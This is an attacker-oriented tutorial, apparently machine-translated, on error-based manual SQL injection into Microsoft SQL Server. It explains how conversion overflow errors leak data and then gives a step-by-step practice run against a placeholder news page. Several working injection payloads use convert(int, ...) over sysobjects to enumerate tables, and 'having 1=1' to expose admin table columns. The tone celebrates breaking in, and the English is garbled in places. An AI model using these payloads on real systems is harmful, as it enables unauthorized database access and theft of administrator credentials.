By Ay shadow
When it comes to Mssql manual injection, I like the error mode. Why? Because you only need to construct a statement without having to guess it one by one, the program will automatically tell you what we want, it saves time and effort. Unlike blind injection in the non-explicit mode, you can guess the last half day. Now, let's start with my thoughts on the principle of the explicit and incorrect mode.
The explicit error mode was initially designed to help programmers modify the code. However, this was just used by us and we intentionally let the program go wrong to expose the sensitive information we wanted.
The last time I talked about having 1 = 1 and group by, the explicit and wrong modes are achieved through syntax errors. This time I am talking about a Data Conversion error, data overflow is achieved through data conversion.
We should all hear about data types, such as int, char, and so on... When we define a data, we define the length of a data. For example, the int type is a four-byte length. If a data exceeds the four-byte length, this data will overflow and the accuracy will be lost, so the compilation software will display the error information.
There is a rule for data conversion, that is, short data can be converted and grown, but long data cannot be converted to short data. What does it mean? For example, the database has Integer Data tinyint (one byte length), smallint (two-byte length), int (four-byte length), tinyint can be converted up to smallint, int without error, but cannot be converted back to smallint and tinyint, otherwise, data overflow occurs. Why? It should be easy to understand that a data type is originally 4 bytes long and converted to 2 bytes long, the space of the two bytes cannot be loaded, and the data is lost. Likewise, the data of the two bytes can be changed to the space of the four bytes, data will not be lost and errors will occur.
When using this method, I use the following two functions:
Data conversion functions
Convert (data type, expression (object to be converted ))
Cast (expression as data type)
The statement we need to use during injection:
Because group by and having alone cannot complete our detection process, we need to cooperate with the look-up table function of other system functions, because the preceding table name must be known before it can be used.
First Function
Select name from sysobjects where xtype = u use this to blow the first table
Select name from sysobjects where xtype = u and name not in (burst table 1, burst Table 2 ...)
Continue until we find the table location we need
Second Function
Select table_name from information_schema.tables
Select table_name from information_schema.tables where table_name not in (burst table 1, burst Table 2 ...).
Practice
Target aspx? Id = 3 "tip>Http://www.xxx.com/shownews.aspx? Id = 3
First, get an injection point. We need to determine the type of database mssql, access, or other.
I. Submit
Http://www.xxx.com/shownews.aspx? Id = 3And user> 0
The username is Jxb_Ojc_Zj_Cn.
2. Submit
Http://www.xxx.com/shownews.aspx? Id = 3And db_name ()> 0
The obtained database is Jxb_Ojc_Zj_Cn.
Iii. Continue submission
Http://www.xxx.com/shownews.aspx? Id = 3And 1 = convert (int, (select top 1 name from sysobjects where xtype = 'U' and status> 0 ))
Based on the returned results, it should not be the table we want
4. Submit (this saves many steps for the same operation until it is found that the table storing the user name is very likely)
Http://www.xxx.com/shownews.aspx? Id = 3And 1 = convert (int, (select top 1 name from sysobjects where xtype = 'U' and status> 0 and name not in (FM_Page_Class',D99_Tmp,D99_CMD )))
Haha, some people have detected this before...
5. After confirming the representation, we will use having 1 = 1 to expose the list in the table.
SubmitHttp://www.xxx.com/shownews.aspx? Id = 3Select * from FM_admin having 1 = 1
All column names are exposed. Haha, but generally only one column is exposed, so group by is used.